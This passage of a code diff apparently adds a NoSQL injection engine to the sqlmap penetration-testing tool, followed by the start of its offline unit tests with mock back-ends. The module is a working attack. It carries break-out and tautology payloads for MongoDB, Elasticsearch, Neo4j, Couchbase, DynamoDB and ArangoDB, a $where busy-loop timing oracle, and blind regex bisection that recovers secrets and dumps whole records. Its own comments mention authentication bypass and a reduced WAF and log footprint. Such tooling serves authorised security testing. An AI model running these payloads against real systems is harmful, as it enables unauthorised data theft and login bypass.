+ return _boolean(lambda: _fetchValue(place, parameter, truePayload), lambda: _fetchValue(place, parameter, falsePayload)) is not None
+
+def _timed(call):
+ start = time.time()
+ call()
+ return time.time() - start
+
+def _whereDelay(condition):
+ # MongoDB $where (server-side JS) string break-out: busy-loops for ~conf.timeSec seconds whenever
+ # the per-document JS `condition` holds, yielding a timing oracle when no content differential
+ # exists. The document is passed in as `d` (inside the function `this` is not the document).
+ return "%s' || (function(d){if(%s){var t=new Date().getTime();while(new Date().getTime()-t<%d){}}return false})(this) || '1'=='2" % (NOSQL_SENTINEL, condition, int(conf.timeSec * 1000))
+
+def _detectWhere(place, parameter):
+ # an unconditional-delay payload must run ~conf.timeSec slower than the baseline while a
+ # non-delaying one stays fast (the latter guards against a uniformly slow endpoint)
+ threshold = _timed(lambda: _fetchValue(place, parameter, _originalValue(place, parameter) or "1")) + conf.timeSec * 0.5
+ if threshold < conf.timeSec and _timed(lambda: _fetchValue(place, parameter, _whereDelay("true"))) > threshold:
+ if _timed(lambda: _fetchValue(place, parameter, "%s' || '1'=='2" % NOSQL_SENTINEL)) <= threshold:
+ return threshold
+ return None
+
+def _jsString(value):
+ return "'%s'" % value.replace("\\", "\\\\").replace("'", "\\'")
+
+def _whereField(place, parameter, bound, expr, threshold):
+ """Time-based recovery of an arbitrary per-document JavaScript string expression `expr` (e.g. a key
+ name 'Object.keys(d)[i]', or a value 'String(d[name])') via the $where busy-loop oracle"""
+
+ truth = lambda payload: _timed(lambda: _fetchValue(place, parameter, payload)) > threshold
+ return _extract(None, None,
+ lambda n: _whereDelay("%s(%s)&&(%s).length>=%d" % (bound, expr, expr, n)),
+ lambda known, klass: _whereDelay("%s/^%s%s/.test(%s)" % (bound, _javaEscape(known), klass, expr)),
+ truth)
+
+def _whereDump(place, parameter, bound, threshold):
+ """Whole-document dump via server-side-JavaScript key enumeration: walk Object.keys(this) to recover
+ each field name, then String(this[name]) for its value. Returns (columns, rows) or None"""
+
+ columns, values = [], []
+ for index in xrange(NOSQL_MAX_FIELDS):
+ name = _whereField(place, parameter, bound, "Object.keys(d)[%d]" % index, threshold)
+ if not name:
+ break
+ columns.append(name)
+ values.append(_whereField(place, parameter, bound, "String(d[%s])" % _jsString(name), threshold) or "")
+ logger.info("retrieved: %s='%s'" % (name, values[-1]))
+
+ return (columns, [values]) if columns else None
+
+def _classChar(ordinal):
+ char = chr(ordinal)
+ return ("\\" + char) if char in "]\\^-" else char # escape the char-class metacharacters
+
+def _klass(low, high):
+ # a regexp character class spanning the codepoints [low, high] (single member when low == high)
+ return "[%s]" % _classChar(low) if low == high else "[%s-%s]" % (_classChar(low), _classChar(high))
+
+def _propLiteral(name):
+ return "'%s'" % name.replace("\\", "\\\\").replace("'", "\\'")
+
+def _enumField(place, parameter, template, payloadFor):
+ """Content-based recovery of the string matched by a regexp clause built via payloadFor(regexBody),
+ reusing the bisection extractor against the always-true single-record `template`"""
+
+ return _extract(template, lambda value: _fetchValue(place, parameter, value),
+ lambda n: payloadFor(".{%d,}" % n),
+ lambda known, klass: payloadFor(_quoted(_javaEscape(known) + klass)))
+
+def _enumDump(place, parameter, makePayload, keysExpr, valueExpr):
+ """Whole-document dump via key enumeration for the regexp dialects: keysExpr(i) -> the i-th field
+ name, valueExpr(name) -> that field's value. makePayload(targetExpr, regexBody) wraps the dialect
+ break-out and record binding around a ' matches ^' oracle. Returns
+ (columns, rows) or None - the caller can then fall back to single-field extraction"""
+
+ template = _fetchValue(place, parameter, makePayload(keysExpr(0), ".*")) # the bound single record
+ if not template or _isError(template):
+ return None
+
+ columns, values = [], []
+ for index in xrange(NOSQL_MAX_FIELDS):
+ name = _enumField(place, parameter, template, lambda rb, i=index: makePayload(keysExpr(i), rb))
+ if not name:
+ break
+ columns.append(name)
+ values.append(_enumField(place, parameter, template, lambda rb, n=name: makePayload(valueExpr(n), rb)) or "")
+ logger.info("retrieved: %s='%s'" % (name, values[-1]))
+
+ return (columns, [values]) if columns else None
+
+def _cypherDump(place, parameter):
+ """Blind multi-record collection dump (Neo4j Cypher). Walks every matched node in ascending order
+ of its internal node id (a unique, ordered, always-present key - unlike property order, which Neo4j
+ does not guarantee), key-enumerating each node's full document. Returns (columns, rows) or None"""
+
+ fetch = lambda payload: _fetchValue(place, parameter, payload)
+ noMatch = fetch("%s' OR '1'='2" % NOSQL_SENTINEL) # stable zero-record baseline (app closes the quote)
+ differs = lambda payload: _ratio(fetch(payload), noMatch) < UPPER_RATIO_BOUND
+ if not noMatch or not differs("%s' OR '1'='1" % NOSQL_SENTINEL):
+ return None
+
+ # a numeric condition opens no string, so balance the app's trailing quote with a tautology
+ exists = lambda cond: differs("%s' OR %s AND '1'='1" % (NOSQL_SENTINEL, cond))
+
+ def minIdGreater(lower):
+ # smallest internal node id strictly greater than `lower` (None when no further node exists)
+ if not exists("id(u) > %d" % lower):
+ return None
+ hi = lower + 1
+ while not exists("id(u) > %d AND id(u) <= %d" % (lower, hi)):
+ hi *= 2
+ if hi > (1 << 40):
+ return None
+ lo = lower
+ while lo + 1 < hi:
+ mid = (lo + hi) // 2
+ if exists("id(u) > %d AND id(u) <= %d" % (lower, mid)):
+ hi = mid
+ else:
+ lo = mid
+ return hi
+
+ columns, records, lastId = [], [], -1
+ for _ in xrange(NOSQL_MAX_RECORDS):
+ nodeId = minIdGreater(lastId)
+ if nodeId is None:
+ break
+ record = _enumDump(place, parameter,
+ lambda expr, rb, k=nodeId: "%s' OR id(u)=%d AND %s =~ '^%s.*" % (NOSQL_SENTINEL, k, expr, rb),
+ lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n))
+ if record:
+ cols, values = record
+ records.append(dict(zip(cols, values[0]))) # align by field name (keys(u) order is per-node)
+ columns.extend(_ for _ in cols if _ not in columns)
+ lastId = nodeId
+
+ return (columns, [[row.get(_, "") for _ in columns] for row in records]) if records else None
+
+def _partiqlValue(place, parameter, bind, field):
+ """Blind extraction of `field` for the bound record on a DynamoDB PartiQL point. PartiQL has no
+ regexp, so each character is recovered by an ordered string comparison (field >= 'prefix'+char),
+ bisected over the printable-ASCII range. Returns the value or None"""
+
+ quote = lambda value: value.replace("'", "''") # PartiQL escapes a single quote by doubling it
+ fetch = lambda payload: _fetchValue(place, parameter, payload)
+ template = fetch("%s' OR %s%s >= '" % (NOSQL_SENTINEL, bind, field)) # field >= '' -> bound record matches
+ if not template or _isError(template):
+ return None
+
+ truth = lambda value: _ratio(fetch("%s' OR %s%s >= '%s" % (NOSQL_SENTINEL, bind, field, quote(value))), template) > UPPER_RATIO_BOUND
+
+ retVal = ""
+ while len(retVal) < NOSQL_MAX_LENGTH:
+ if not truth(retVal + chr(NOSQL_CHAR_MIN)): # no character at this position -> end of value
+ break
+ lo, hi = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX
+ while lo < hi:
+ mid = (lo + hi + 1) // 2
+ if truth(retVal + chr(mid)):
+ lo = mid
+ else:
+ hi = mid - 1
+ retVal += chr(lo)
+
+ return retVal or None
+
+def _partiqlDump(place, parameter, key):
+ """DynamoDB PartiQL: comparison-extract the injected field, bound to its record by sibling
+ parameters (PartiQL exposes no key-enumeration, so the dumpable field is the injected one)"""
+
+ bind = _constraint(place, parameter, "=", " AND ", prefix="")
+ if not bind: # need a sibling to pin a single record
+ return None
+ value = _partiqlValue(place, parameter, bind, key)
+ return ([key], [[value]]) if value is not None else None
+
+def _extract(template, fetchFn, lengthValue, charValue, truthFn=None):
+ """Blind value recovery: binary-searches the length, then bisects each character's codepoint over
+ the printable-ASCII range using regexp character-class ranges (sqlmap-style inference, ~log2(range)
+ requests per character instead of a linear scan - far smaller WAF/log footprint). lengthValue(n)
+ and charValue(known, charClass) render the dialect payload; the oracle is the content ratio against
+ `template` by default, or `truthFn(payload)` (e.g. the $where timing predicate)"""
+
+ truth = truthFn or (lambda value: _ratio(fetchFn(value), template) > UPPER_RATIO_BOUND)
+
+ length, probe = 0, 1
+ while probe <= NOSQL_MAX_LENGTH and truth(lengthValue(probe)):
+ length, probe = probe, probe * 2
+
+ low, high = length, min(probe, NOSQL_MAX_LENGTH + 1)
+ while low + 1 < high:
+ mid = (low + high) // 2
+ if truth(lengthValue(mid)):
+ low = mid
+ else:
+ high = mid
+
+ if not low:
+ return None
+
+ debugMsg = "retrieving the value (%d characters)" % low
+ logger.debug(debugMsg)
+
+ retVal = ""
+ for _ in xrange(low):
+ lo, hi = NOSQL_CHAR_MIN, NOSQL_CHAR_MAX
+ if not truth(charValue(retVal, _klass(lo, hi))):
+ retVal += '?' # character outside the printable-ASCII range
+ continue
+ while lo < hi:
+ mid = (lo + hi) // 2
+ if truth(charValue(retVal, _klass(lo, mid))):
+ hi = mid
+ else:
+ lo = mid + 1
+ retVal += chr(lo)
+
+ return retVal
+
+def _resolve(place, parameter, key):
+ """Tries each NoSQL dialect in turn; the first that detects fixes the back-end and the extraction
+ payloads. Returns a Vector (whose `template`/`lengthValue` are None for detection-only back-ends)
+ or None when nothing matches"""
+
+ field = "u.%s" % key
+
+ template = _detectMongo(place, parameter)
+ if template:
+ return Vector(_fingerprintMongo(place, parameter),
+ lambda value: _fetch(place, parameter, "$regex", value),
+ lambda n: "^.{%d,}$" % n,
+ lambda known, klass: "^%s%s" % (re.escape(known), klass),
+ template=template, bypass='{"$ne": null}')
+
+ template = _detectES(place, parameter)
+ if template:
+ return Vector(_fingerprintLucene(place, parameter),
+ lambda value: _fetchValue(place, parameter, value),
+ lambda n: "/.{%d,}/" % n,
+ lambda known, klass: "/%s%s.*/" % (_lucene(known), klass),
+ template=template, bypass='*')
+
+ template = _detectCypher(place, parameter)
+ if template:
+ constraint = _constraint(place, parameter)
+
+ # Neo4j Cypher, Couchbase N1QL and DynamoDB PartiQL all share the ' OR '1'='1 break-out; tell
+ # them apart by the regexp/string primitive the back-end honors ('=~', 'REGEXP_CONTAINS', or
+ # PartiQL 'begins_with')
+ if not _confirm(place, parameter, "%s' OR %s%s =~ '.*" % (NOSQL_SENTINEL, constraint, field), "%s' OR %s%s =~ '%s" % (NOSQL_SENTINEL, constraint, field, NOSQL_SENTINEL)):
+ if _confirm(place, parameter, "%s' OR REGEXP_CONTAINS(%s, '.*') OR '1'='2" % (NOSQL_SENTINEL, field), "%s' OR REGEXP_CONTAINS(%s, '%s') OR '1'='2" % (NOSQL_SENTINEL, field, NOSQL_SENTINEL)):
+ return Vector("Couchbase",
+ lambda value: _fetchValue(place, parameter, value),
+ lambda n: "%s' OR REGEXP_CONTAINS(%s, '^.{%d,}') OR '1'='2" % (NOSQL_SENTINEL, field, n),
+ lambda known, klass: "%s' OR REGEXP_CONTAINS(%s, '^%s') OR '1'='2" % (NOSQL_SENTINEL, field, _quoted(_javaEscape(known) + klass)),
+ template=template, bypass="' OR '1'='1",
+ dump=lambda: _enumDump(place, parameter,
+ lambda expr, rb: "%s' OR REGEXP_CONTAINS(%s, '^%s') OR '1'='2" % (NOSQL_SENTINEL, expr, rb),
+ lambda i: "OBJECT_NAMES(u)[%d]" % i, lambda n: "TOSTRING(u[%s])" % _propLiteral(n)))
+
+ if _confirm(place, parameter, "%s' OR begins_with(%s, '') OR '1'='2" % (NOSQL_SENTINEL, key), "%s' OR begins_with(%s, '%s') OR '1'='2" % (NOSQL_SENTINEL, key, NOSQL_SENTINEL)):
+ return Vector("DynamoDB", None, None, None, template=template, bypass="' OR '1'='1",
+ dump=lambda: _partiqlDump(place, parameter, key))
+
+ return Vector("Neo4j", None, None, None, template=template, bypass="' OR '1'='1",
+ dump=lambda: _cypherDump(place, parameter) or _enumDump(place, parameter,
+ lambda expr, rb: "%s' OR %s%s =~ '^%s.*" % (NOSQL_SENTINEL, constraint, expr, rb),
+ lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n)))
+
+ template = _detectAQL(place, parameter)
+ if template:
+ constraint = _constraint(place, parameter, "==", " && ")
+
+ # ArangoDB AQL and MongoDB $where (server-side JavaScript) both satisfy the ' || '1'=='1
+ # break-out; tell them apart by which regexp-match primitive holds - AQL '=~' or a JS /re/.test()
+ if not _confirm(place, parameter, "%s' || ('x' =~ '.') || '1'=='2" % NOSQL_SENTINEL, "%s' || ('x' =~ 'y') || '1'=='2" % NOSQL_SENTINEL) \
+ and _confirm(place, parameter, "%s' || /./.test('x') || '1'=='2" % NOSQL_SENTINEL, "%s' || /y/.test('x') || '1'=='2" % NOSQL_SENTINEL):
+ bound = _constraint(place, parameter, "==", "&&", prefix="this.")
+ whereTemplate = _fetchValue(place, parameter, "%s' || (%sthis.%s) || '1'=='2" % (NOSQL_SENTINEL, bound, key))
+ return Vector("MongoDB ($where)",
+ lambda value: _fetchValue(place, parameter, value),
+ lambda n: "%s' || (%sthis.%s&&this.%s.length>=%d) || '1'=='2" % (NOSQL_SENTINEL, bound, key, key, n),
+ lambda known, klass: "%s' || (%sthis.%s&&/^%s%s/.test(this.%s)) || '1'=='2" % (NOSQL_SENTINEL, bound, key, _javaEscape(known), klass, key),
+ template=whereTemplate, bypass="' || '1'=='1")
+
+ return Vector("ArangoDB",
+ lambda value: _fetchValue(place, parameter, value),
+ lambda n: "%s' || (%s%s =~ '^.{%d,}') || '1'=='2" % (NOSQL_SENTINEL, constraint, field, n),
+ lambda known, klass: "%s' || (%s%s =~ '^%s') || '1'=='2" % (NOSQL_SENTINEL, constraint, field, _quoted(_javaEscape(known) + klass)),
+ template=template, bypass="' || '1'=='1",
+ dump=lambda: _enumDump(place, parameter,
+ lambda expr, rb: "%s' || (%s%s =~ '^%s') || '1'=='2" % (NOSQL_SENTINEL, constraint, expr, rb),
+ lambda i: "ATTRIBUTES(u)[%d]" % i, lambda n: "TO_STRING(u[%s])" % _propLiteral(n)))
+
+ numeric = _detectNumeric(place, parameter)
+ if numeric:
+ dbms, template, bypass = numeric
+ dump = None
+ if dbms == "Neo4j": # bind the dump to the injected numeric field (e.g. u.id = 1)
+ value = (_originalValue(place, parameter) or "1").strip()
+ dump = lambda: _enumDump(place, parameter,
+ lambda expr, rb: "%s AND (%s =~ '^%s.*')" % (value, expr, rb),
+ lambda i: "keys(u)[%d]" % i, lambda n: "toString(u[%s])" % _propLiteral(n))
+ return Vector(dbms, None, None, None, template=template, bypass=bypass, dump=dump)
+
+ threshold = _detectWhere(place, parameter)
+ if threshold is not None:
+ bound = _constraint(place, parameter, "==", "&&", prefix="d.")
+ return Vector("MongoDB ($where)", None, None, None,
+ dump=lambda: _whereDump(place, parameter, bound, threshold))
+
+ engine = _detectError(place, parameter)
+ if engine:
+ return Vector(engine, None, None, None)
+
+ return None
+
+def _inband(place, parameter, template):
+ """In-band data exposure gate: returns the always-true response when it carries materially more
+ (reflected) content than the original request - i.e. the injection is returning extra records
+ directly - else None"""
+
+ original = _fetchValue(place, parameter, _originalValue(place, parameter) or "1")
+ if template and len(template) > len(original) and _ratio(template, original) < UPPER_RATIO_BOUND and not re.search(NOSQL_ERROR_REGEX, template):
+ return template
+ return None
+
+def _clean(cell):
+ cell = re.sub(r"(?s)<[^>]+>", "", cell)
+ for entity, char in (("&", '&'), ("<", '<'), (">", '>'), (""", '"'), ("'", "'"), ("'", "'")):
+ cell = cell.replace(entity, char)
+ return re.sub(r"\s+", " ", cell).strip()
+
+def _records(page):
+ """Parses structured records out of a reflected response - a JSON array of objects or an HTML
+ table - returning (columns, rows) for a tabular dump, else None"""
+
+ try:
+ data = json.loads(page, object_pairs_hook=OrderedDict)
+ rows = data if isinstance(data, list) else next((_ for _ in data.values() if isinstance(_, list)), None) if isinstance(data, dict) else None
+ rows = [_ for _ in (rows or []) if isinstance(_, dict)]
+ if rows:
+ columns = []
+ for row in rows:
+ columns.extend(_ for _ in row if _ not in columns)
+ return columns, [[("NULL" if row[_] is None else _clean("%s" % row[_])) if _ in row else "" for _ in columns] for row in rows]
+ except (ValueError, TypeError):
+ pass
+
+ for body in re.findall(r"(?is)", page or ""):
+ header, rows = None, []
+ for index, tr in enumerate(re.findall(r"(?is)]*>(.*?)
", body)):
+ cells = re.findall(r"(?is)]*>(.*?)", tr)
+ if index == 0 and re.search(r"(?i)]", tr):
+ header = [_clean(_) for _ in cells]
+ elif cells:
+ rows.append([_clean(_) for _ in cells])
+ if rows:
+ width = max(len(_) for _ in rows)
+ columns = header if header and len(header) == width else ["column_%d" % (_ + 1) for _ in xrange(width)]
+ return columns, [row + [""] * (width - len(row)) for row in rows]
+
+ return None
+
+def _grid(columns, rows):
+ """Renders (columns, rows) as a sqlmap-style ASCII table"""
+
+ widths = [max([len(columns[index])] + [len(row[index]) for row in rows if index < len(row)]) for index in xrange(len(columns))]
+ separator = '+' + '+'.join('-' * (width + 2) for width in widths) + '+'
+ line = lambda cells: "| " + " | ".join((cells[index] if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |"
+ return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator])
+
+def _dumpInband(place, key, page):
+ """Renders in-band records as a regular sqlmap-style table, or falls back to cleaned text"""
+
+ parsed = _records(page)
+ if parsed:
+ columns, rows = parsed
+ conf.dumper.singleString("NoSQL: %s parameter '%s' in-band records [%d]:\n%s" % (place, key, len(rows), _grid(columns, rows)))
+ else:
+ text = re.sub(r"\s+", " ", re.sub(r"(?s)<[^>]+>", " ", page)).strip()
+ conf.dumper.singleString("NoSQL: %s parameter '%s' in-band data: %s" % (place, key, text[:NOSQL_DUMP_LIMIT]))
+
+def nosqlScan():
+ """Entry point for '--nosql': detects NoSQL injection (MongoDB/CouchDB operator, Lucene
+ query_string, Cypher/N1QL/AQL string break-out, MongoDB $where time-based, or error-based). On a
+ confirmed point it tries, in order, to (1) dump records exposed in-band by the always-true payload
+ and (2) blindly recover the targeted field via the regexp/timing oracle"""
+
+ global NOSQL_SENTINEL
+ NOSQL_SENTINEL = randomStr(length=10, lowercase=True)
+
+ # NoSQL injection from an application-scoped point is confined to the back-end's single query
+ # (one collection/label) - it confirms and dumps what that query can reach, with no analog to the
+ # SQL database/table/user/banner enumeration, so those switches do not apply here
+ infoMsg = "'--nosql' is self-contained: it confirms the injection and dumps the reachable "
+ infoMsg += "collection/document. SQL enumeration switches (e.g. --banner, --dbs, --tables, "
+ infoMsg += "--users, --sql-query) do not map to a NoSQL back-end and are ignored"
+ logger.info(infoMsg)
+
+ tested = found = 0
+
+ for place in (_ for _ in NOSQL_PLACES if _ in conf.paramDict):
+ for parameter in list(conf.paramDict[place].keys()):
+ key = _jsonKey(parameter)
+
+ if conf.testParameter and not any(_ in conf.testParameter for _ in (key, parameter)):
+ continue
+
+ tested += 1
+ infoMsg = "testing NoSQL injection on %s parameter '%s'" % (place, key)
+ logger.info(infoMsg)
+
+ vector = _resolve(place, parameter, key)
+ if not vector:
+ continue
+
+ found += 1
+ infoMsg = "%s parameter '%s' is vulnerable to NoSQL injection (back-end: '%s')" % (place, key, vector.dbms)
+ logger.info(infoMsg)
+
+ # standard sqlmap-style injection-point summary (reproducible vector)
+ if vector.bypass == '{"$ne": null}':
+ title, payload = "operator injection", "%s[$ne]=%s" % (key, NOSQL_SENTINEL)
+ elif vector.bypass == '*':
+ title, payload = "Lucene query_string injection", "%s=*" % key
+ elif vector.bypass:
+ context = "numeric" if vector.bypass[:1].isdigit() else "string"
+ title, payload = "boolean-based blind (%s)" % context, "%s=%s" % (key, vector.bypass)
+ elif vector.dump is not None:
+ title, payload = "time-based blind (server-side JavaScript $where)", "%s=' || (sleep loop) || '" % key
+ else:
+ title, payload = "error-based", "%s=%s'" % (key, _originalValue(place, parameter) or "1")
+ report = "---\nParameter: %s (%s)\n Type: NoSQL injection\n Title: %s %s\n Payload: %s\n---" % (key, place, vector.dbms, title, payload)
+ conf.dumper.singleString(report)
+
+ if vector.bypass:
+ infoMsg = "%s parameter '%s' can be coerced always-true with '%s' (e.g. authentication/filter bypass)" % (place, key, vector.bypass)
+ logger.info(infoMsg)
+
+ dumped = False
+
+ # a named whole-document dump is preferred over the unnamed in-band table
+ if vector.dump is not None:
+ infoMsg = "retrieving the reachable document(s)"
+ logger.info(infoMsg)
+ records = vector.dump()
+ if records:
+ columns, rows = records
+ infoMsg = "dumped %d record%s (%d field%s)" % (len(rows), 's' if len(rows) != 1 else '', len(columns), 's' if len(columns) != 1 else '')
+ logger.info(infoMsg)
+ conf.dumper.singleString("NoSQL: %s parameter '%s' %s:\n%s" % (place, key, "documents" if len(rows) != 1 else "document", _grid(columns, rows)))
+ dumped = True
+
+ if not dumped and vector.template is not None:
+ exposure = _inband(place, parameter, vector.template)
+ if exposure:
+ infoMsg = "the always-true payload returns additional records (in-band data exposure)"
+ logger.info(infoMsg)
+ _dumpInband(place, key, exposure)
+ dumped = True
+
+ if vector.lengthValue is not None:
+ value = _extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth)
+ if value is not None:
+ conf.dumper.singleString("NoSQL: %s parameter '%s' -> %s" % (place, key, repr(value)))
+ dumped = True
+
+ if not dumped:
+ if vector.template is None and vector.truth is None and vector.dump is None:
+ warnMsg = "injection is detection-only for back-end '%s' (no extraction oracle for this engine)" % vector.dbms
+ else:
+ warnMsg = "injection on '%s' is confirmed but yielded no data here: this point exposes only a boolean oracle on a non-extractable (e.g. numeric) field. Target a string-compared parameter (e.g. a login/search field) to blindly read a value" % key
+ logger.warning(warnMsg)
+
+ if not found:
+ warnMsg = "no parameter appears to be injectable via NoSQL injection (%d tested)" % tested
+ logger.warning(warnMsg)
diff --git a/tests/test_nosql.py b/tests/test_nosql.py
new file mode 100644
index 00000000000..3703471f8ce
--- /dev/null
+++ b/tests/test_nosql.py
@@ -0,0 +1,650 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+
+Offline, deterministic tests for the NoSQL injection engine. Mock oracles stand in for the
+HTTP/back-end layer so detection and blind extraction can be exercised without a live target,
+covering each dialect: MongoDB/CouchDB operator injection, Elasticsearch/Solr query_string,
+Neo4j Cypher and ArangoDB AQL string break-out.
+"""
+
+import re
+import unittest
+
+from _testutils import bootstrap
+bootstrap()
+
+import lib.techniques.nosql.inject as ni
+
+SECRET = "S3cr3t_9"
+MATCH = "Welcome user; rows: alpha, bravo, charlie"
+NOMATCH = "Invalid credentials; no rows"
+
+
+def _mongo(place, parameter, op, value, isArray=False):
+ if op == "$ne":
+ return MATCH
+ if op == "$in":
+ return NOMATCH
+ if op == "$regex":
+ try:
+ return MATCH if re.match(value, SECRET) is not None else NOMATCH
+ except re.error:
+ return "error: invalid regular expression"
+ return ""
+
+
+def _es(place, parameter, value):
+ if value == "*":
+ return MATCH
+ if value == ni.NOSQL_SENTINEL:
+ return NOMATCH
+ if value.startswith("/") and value.endswith("/"): # Lucene regexp is full-anchored
+ try:
+ return MATCH if re.match("^(?:%s)$" % value[1:-1], SECRET) is not None else NOMATCH
+ except re.error:
+ return "error: parse_exception"
+ return NOMATCH
+
+
+class TestNoSqlMongo(unittest.TestCase):
+ def setUp(self):
+ self._orig = ni._fetch
+ ni._fetch = _mongo
+
+ def tearDown(self):
+ ni._fetch = self._orig
+
+ def test_detect(self):
+ self.assertTrue(ni._detectMongo("GET", "password"))
+
+ def test_extract(self):
+ template = ni._fetch("GET", "password", "$ne", ni.NOSQL_SENTINEL)
+ value = ni._extract(template,
+ lambda v: ni._fetch("GET", "password", "$regex", v),
+ lambda n: "^.{%d,}$" % n,
+ lambda known, klass: "^" + re.escape(known) + klass)
+ self.assertEqual(value, SECRET)
+
+ def test_not_injectable(self):
+ ni._fetch = lambda *args, **kwargs: MATCH
+ self.assertIsNone(ni._detectMongo("GET", "password"))
+
+
+class TestNoSqlElasticsearch(unittest.TestCase):
+ def setUp(self):
+ self._orig = ni._fetchValue
+ ni._fetchValue = _es
+
+ def tearDown(self):
+ ni._fetchValue = self._orig
+
+ def test_detect(self):
+ self.assertTrue(ni._detectES("GET", "q"))
+
+ def test_extract(self):
+ template = ni._fetchValue("GET", "q", "*")
+ value = ni._extract(template,
+ lambda v: ni._fetchValue("GET", "q", v),
+ lambda n: "/.{%d,}/" % n,
+ lambda known, klass: "/%s%s.*/" % (ni._lucene(known), klass))
+ self.assertEqual(value, SECRET)
+
+ def test_not_injectable(self):
+ ni._fetchValue = lambda *args, **kwargs: MATCH
+ self.assertIsNone(ni._detectES("GET", "q"))
+
+
+def _cypher(place, parameter, value):
+ if "'1'='1" in value:
+ return MATCH
+ if "'1'='2" in value:
+ return NOMATCH
+ m = re.search(r"=~ '\^(.*)$", value) # the regex body after the =~ operator
+ if m:
+ try:
+ return MATCH if re.match("^(?:%s)$" % m.group(1), SECRET) is not None else NOMATCH
+ except re.error:
+ return NOMATCH
+ return NOMATCH
+
+
+class TestNoSqlCypher(unittest.TestCase):
+ def setUp(self):
+ self._orig = ni._fetchValue
+ ni._fetchValue = _cypher
+
+ def tearDown(self):
+ ni._fetchValue = self._orig
+
+ def test_detect(self):
+ self.assertTrue(ni._detectCypher("GET", "password"))
+
+ def test_extract(self):
+ template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' OR '1'='1")
+ value = ni._extract(template,
+ lambda v: ni._fetchValue("GET", "password", v),
+ lambda n: "%s' OR u.password =~ '^.{%d,}" % (ni.NOSQL_SENTINEL, n),
+ lambda known, klass: "%s' OR u.password =~ '^%s%s.*" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass))
+ self.assertEqual(value, SECRET)
+
+
+def _aql(place, parameter, value):
+ m = re.search(r"=~ '(\^[^']*)'", value) # the regex body inside =~ '...'
+ if m:
+ try: # ArangoDB =~ is a partial (unanchored) match
+ return MATCH if re.search(m.group(1), SECRET) is not None else NOMATCH
+ except re.error:
+ return NOMATCH
+ if "'1'=='1" in value:
+ return MATCH
+ return NOMATCH
+
+
+class TestNoSqlArango(unittest.TestCase):
+ def setUp(self):
+ self._orig = ni._fetchValue
+ ni._fetchValue = _aql
+
+ def tearDown(self):
+ ni._fetchValue = self._orig
+
+ def test_detect(self):
+ self.assertTrue(ni._detectAQL("GET", "password"))
+
+ def test_extract(self):
+ template = ni._fetchValue("GET", "password", ni.NOSQL_SENTINEL + "' || '1'=='1")
+ value = ni._extract(template,
+ lambda v: ni._fetchValue("GET", "password", v),
+ lambda n: "%s' || (u.password =~ '^.{%d,}') || '1'=='2" % (ni.NOSQL_SENTINEL, n),
+ lambda known, klass: "%s' || (u.password =~ '^%s%s') || '1'=='2" % (ni.NOSQL_SENTINEL, ni._javaEscape(known), klass))
+ self.assertEqual(value, SECRET)
+
+
+def _n1ql(place, parameter, value):
+ m = re.search(r"REGEXP_CONTAINS\([^,]+, '([^']*)'\)", value)
+ if m:
+ try: # model the single-quoted string layer (collapse the doubled backslashes)
+ return MATCH if re.search(m.group(1).replace("\\\\", "\\"), SECRET) is not None else NOMATCH
+ except re.error:
+ return NOMATCH
+ if "=~" in value: # N1QL has no =~ operator -> engine error
+ return "error: syntax error near '=~'"
+ if "'1'='1" in value:
+ return MATCH
+ return NOMATCH
+
+
+class TestNoSqlN1QL(unittest.TestCase):
+ """Couchbase N1QL shares the ' OR '1'='1 break-out with Neo4j; _resolve() must disambiguate by the
+ regexp-match primitive (=~ fails, REGEXP_CONTAINS works) and still extract"""
+
+ def setUp(self):
+ self._f, self._fv = ni._fetch, ni._fetchValue
+ ni._fetch = lambda *args, **kwargs: "" # keep MongoDB operator detection out of the way
+ ni._fetchValue = _n1ql
+ ni.conf.parameters = {"GET": "name=luther&password=x"}
+
+ def tearDown(self):
+ ni._fetch, ni._fetchValue = self._f, self._fv
+
+ def test_resolve_disambiguates_couchbase(self):
+ vector = ni._resolve("GET", "password", "password")
+ self.assertEqual(vector.dbms, "Couchbase")
+ self.assertEqual(vector.bypass, "' OR '1'='1")
+
+ def test_extract(self):
+ vector = ni._resolve("GET", "password", "password")
+ self.assertEqual(ni._extract(vector.template, vector.fetch, vector.lengthValue, vector.charValue, vector.truth), SECRET)
+
+
+def _whereTruth(payload):
+ # emulate the $where timing oracle: a payload "delays" (=> True) iff its embedded JS condition holds
+ m = re.search(r"length>=(\d+)", payload)
+ if m:
+ return len(SECRET) >= int(m.group(1))
+ m = re.search(r"/\^([^/]*)/\.test", payload)
+ if m:
+ return re.search("^" + m.group(1), SECRET) is not None
+ return False
+
+
+class TestNoSqlWhere(unittest.TestCase):
+ """MongoDB $where time-based: validates the server-side-JS payload shapes and the time-based
+ extraction loop (timing predicate emulated deterministically)"""
+
+ def setUp(self):
+ ni.conf.timeSec = 5
+
+ def test_extract(self):
+ key = "password"
+ lengthValue = lambda n: ni._whereDelay("d.%s&&d.%s.length>=%d" % (key, key, n))
+ charValue = lambda known, klass: ni._whereDelay("d.%s&&/^%s%s/.test(d.%s)" % (key, ni._javaEscape(known), klass, key))
+ self.assertEqual(ni._extract(None, None, lengthValue, charValue, _whereTruth), SECRET)
+
+
+def _jswhere(place, parameter, value):
+ # emulate a content-bearing MongoDB $where (server-side JavaScript) endpoint
+ if " OR " in value or " =~ " in value: # not valid JS -> consistent (non-diverging) error
+ return ""
+ m = re.search(r"/(.)/\.test\('x'\)", value) # JS regexp-test disambiguation probe
+ if m:
+ return MATCH if re.search(m.group(1), "x") is not None else NOMATCH
+ m = re.search(r"/\^([^/]*)/\.test\(this\.password\)", value) # value extraction
+ if m:
+ try:
+ return MATCH if re.search("^" + m.group(1), SECRET) is not None else NOMATCH
+ except re.error:
+ return NOMATCH
+ m = re.search(r"length>=(\d+)", value) # length search
+ if m:
+ return MATCH if len(SECRET) >= int(m.group(1)) else NOMATCH
+ if "'1'=='1" in value or "this.password)" in value: # boolean detection / bound always-true template
+ return MATCH
+ return NOMATCH
+
+
+class TestNoSqlWhereContent(unittest.TestCase):
